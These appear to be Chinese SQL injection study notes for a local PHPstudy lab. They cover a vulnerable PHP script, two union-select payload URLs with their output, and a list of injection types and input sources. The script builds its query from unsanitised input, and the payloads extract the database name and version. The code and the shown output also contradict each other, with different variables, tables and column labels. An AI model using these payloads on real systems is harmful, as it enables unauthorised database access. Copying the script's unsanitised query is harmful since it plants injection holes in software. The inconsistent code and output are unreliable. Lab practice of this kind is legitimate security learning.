准备为PHPstudy环境
<?php
$id = $_GET['t'];
$conn = mysql_connect("127.0.0.1","root","root");
mysql_select_db("kimmy",$conn);
$sql="select * from admin where use=$title";
$result = mysql_query($sql);
while($row = mysql_fetch_array($result)){
echo "UserId".$row['id']."<br >";
echo "Title".$row['title']."<br >";
echo "TextContent".$row['text']."<br >";
}
mysql_close($conn);
echo "The SQL Sentence:".$sql;
?>
数字型
字符型:
PHP脚本
URL:
http://192.168.221.188/sqltest/index.php?t=admin' union select 1,2,3 and '1'='1
输出:
UserId:1
Username:admin
Password:password
UserId:1
Username:2
Password:1
The SQL Sentence:select * from info where username='admin' union select 1,2,3 and '1'='1'
URL:
http://192.168.221.188/sqltest/index.php?t=admin' union select database(),version(),3 and '1'='1
输出:
UserId:1
Username:admin
Password:password
UserId:kimmy
Username:5.5.53
Password:1
The SQL Sentence:select * from info where username='admin' union select database(),version(),3 and '1'='1'
搜索型:
%通配符
提交注入
GET注入
Post注入
Cookie注入
http头注入
基础;http数据包
PHP:
$_GET 接受get传递
$_POST接受post传递
$_COOKIE接受cookie传递
$_REQUEST 全部接受
Asp:
Request.querystring 接受get
Request.form接受post
Request.cookie 接受cookie
Request 全部接受